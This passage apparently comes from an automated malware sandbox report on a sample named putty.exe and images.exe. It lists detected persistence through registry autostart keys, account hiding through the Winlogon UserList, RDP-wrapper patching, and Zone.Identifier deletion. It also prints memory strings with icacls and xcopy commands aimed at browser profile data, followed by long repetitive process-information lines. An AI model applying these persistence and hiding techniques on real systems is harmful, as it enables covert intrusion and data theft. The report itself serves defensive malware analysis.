        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,15_2_00413695

        Boot Survival:

        barindex
        Creates an undocumented autostart registry key Show sources
        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Load
        Source: C:\ProgramData\images.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_0040D3A8

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Contains functionality to hide user accountsShow sources
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
        Source: putty.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: putty.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: images.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\user\AppData\Roaming\putty.exeFile opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeFile opened: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe:Zone.Identifier read attributes | delete
        Hides user accountsShow sources
        Source: C:\ProgramData\images.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList eC.vaAf
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
